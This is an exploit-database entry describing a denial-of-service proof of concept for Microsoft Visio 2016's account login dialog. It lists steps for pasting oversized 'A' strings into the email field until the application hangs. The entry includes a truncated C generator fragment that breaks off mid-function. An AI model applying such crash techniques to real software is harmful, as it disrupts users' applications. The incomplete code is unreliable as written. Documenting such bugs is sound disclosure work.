Microsoft Visio 2016 16.0.4738.1000 - Log in accounts Denial of Service Exploit

ID 1337DAY-ID-32442
Type zdt
Reporter César Adrián Coronado Llanos
Modified 2019-03-28T00:00:00


Exploit for windows platform in category dos / poc

                                            # -⋆- coding: utf-8 -⋆-
Created on Thu Feb 21 01:32:50 2019

@author: César

#Exploit Title: Microsoft Visio 2016 (16.0.4738.1000) "Log in accounts" allows go on whit email formed by one thousand A in every of its parts [email protected] 
#Descovered by: César Adrián Coronado Llanos
#Descovered Date; Sun Feb 17 20:34:23 2019
#Vendor Homepage:
#Tested Version: 16.0.4738.1000 x64
#Tested on OS: Microsoft Windows 10 Home Single Language x64
#Versión 		10.0.10240 compilación 10240

#Steps to produce the crash
#1.- Run c code: generator.c
#2.- Open the file created "letters.txt" and copy the text content to clipboard
#3.- Open Visio 2016
#4.- Click in change account or Login
#5.- In the Login paste the clipboard, typewrite @ paste again the clipboard, typewrite . and paste for last time the clipboard, clik in next
#6.- Click in professional account
#7.- Visio 2016 don't respond, however it stays in a white window and don't send us any message

Note: For do this you need internet conection.

int main(){
	int i;
	FILE *letters;
	if((letters = fopen("letters.txt","w+")) != NULL){
	printf("\tThe file was created successfully!!\n");

Note: This code was compiled in dev C++

# [2019-03-28]  #